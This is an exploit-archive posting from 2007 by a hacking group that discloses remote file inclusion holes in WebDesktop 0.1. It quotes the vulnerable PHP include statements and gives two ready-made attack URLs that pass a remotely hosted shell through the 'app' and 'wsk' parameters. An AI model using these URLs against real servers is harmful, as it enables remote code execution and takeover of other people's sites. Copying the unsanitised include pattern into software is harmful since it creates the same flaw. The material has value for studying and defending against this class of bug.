[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WebDesktop 0.1 Remote File Inclusion Vulnerabilities
# Published : 2007-10-11
# Author : S.W.A.T.
# Previous Title : TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit
# Next Title : Pindorama 0.1 client.php Remote File Inclusion Vulnerability
\|///
\ - - // Xmors Underground Group
( @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Portal : WebDesktop 0.1
Download : http://downloads.sourceforge.net/pns-webdesktop/webDesktop-0.1-linux.tar.gz
Author : S.W.A.T.
HomePage : wWw.XmorS.CoM
Type : Remote File Inclusion
Y! ID : Svvateam
E-Mail : Svvateam@yahoo.com / S.W.4.T@hackermail.com
Dork : :(
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
( ) /
_) (_/
+---------------------------------------------------------------------------------------------+
Vuln Code :
include($wsk . ".wsk/" . $wsk . ".php");
&&&&&&&&
include($app . ".app/" . $frm . ".frm/" . $frm . ".php");
+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+
Exploit :
http://[TARGET]/[PATH]/apps/apps.php?app=[-Sh3ll-]
http://[TARGET]/[PATH]/wsk/wsk.php?wsk=[-Sh3ll-]
+---------------------------------------------------------------------------------------------+
# www.Syue.com [2007-10-11]